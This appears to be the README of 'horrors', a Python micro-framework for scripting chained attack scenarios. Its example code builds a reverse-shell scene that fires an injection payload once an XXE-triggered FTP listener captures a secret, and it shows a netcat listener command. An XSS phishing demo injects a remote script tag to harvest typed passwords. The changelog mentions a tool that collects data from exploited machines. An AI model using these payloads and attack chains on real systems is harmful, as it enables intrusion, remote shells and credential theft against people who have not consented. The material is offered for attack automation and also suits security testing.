A micro-framework for writing attack scenarios starring multiple vulnerabilities.

This framework was created in order to simplify attack automation and exploit development. All you have to do is, for example:

class ReverseShell(scenarios.Scene):

    async def task(self):
        """Wait for `xxe` state triggered when remote client connects via FTP and sends the secret"""

        await self.http_post(
            'http://{rhost}:{rport}/query/'.format(**self.context),
            'secret={secret}&query=DROP+TABLE+IF+EXISTS+[...]{lhost}+{lport_reverse}'.format(**self.context)
        )

context = {
    'rhost': '127.0.0.1',
    'rport': 8008,
    'lhost': '127.0.0.1',
    'lport_reverse': 4444,
}

ftpd = services.FTPReader()
ftpd.add_event('xxe', when=events.DataMatch(r'.+SecretKey=(.+);', in_context='secret'))

story = scenarios.Scenario(context=context, debug=True, http_proxy='http://127.0.0.1:8080')
story.add_service(ftpd)
story.add_scene(ReverseShell, when='xxe')
story.play()

$ pip3 install git+https://github.com/tasooshi/horrors

Examples are included in the horrors/examples directory. Try it out by running:

$ nc -lv4 4444
examples/vulnchain:$ victim.py
examples/vulnchain:$ attacker.py

Or (this one requires interaction):

examples/xssphish:$ victim.py
examples/xssphish:$ attacker.py

Now visit http://127.0.0.1:8008/?message=<script src="http://127.0.0.1:8888/fakequery.js"></script>, type some passwords and watch collected.json for incoming credentials.

• 2021/12/23 Getting production ready (v0.6)
  • Major refactoring and backward incompatible changes
  • Added unit tests
  • Replaced Flask with Sanic framework
  • Scenes are now class-based
• 2021/12/14 Beta (v0.5)
  • Improved HTTP proxy logic
• 2021/12/12 Beta (v0.4)
  • A bit of asyncio cleaning up
  • Fixed examples to match the new API
  • Simplified services imports and generally everything
  • Changed default ports
  • Added requirements to setup.py
  • Replaced requests with aiohttp
• 2021/08/26 Beta (v0.3)
  • Yet another refactoring.
  • Added full HTTP support using Flask.
  • Added utility/collector.py to simplify data collection from exploited machines (and another related example).
• 2021/08/10 Beta (v0.2)
  • Refactored and largely simplified codebase: it is now easier to reuse code between multiple scenarios by mixing functions, wrapping in classes etc.
  • Steps are not executed sequentially, you decide depending on signals (events) registered when adding to scenario (story.add(func, when='something')).
  • Removed asyncio.Event dependency since I was not able to make it work the way I wanted.
• 2021/07/30 Initial release (v0.1)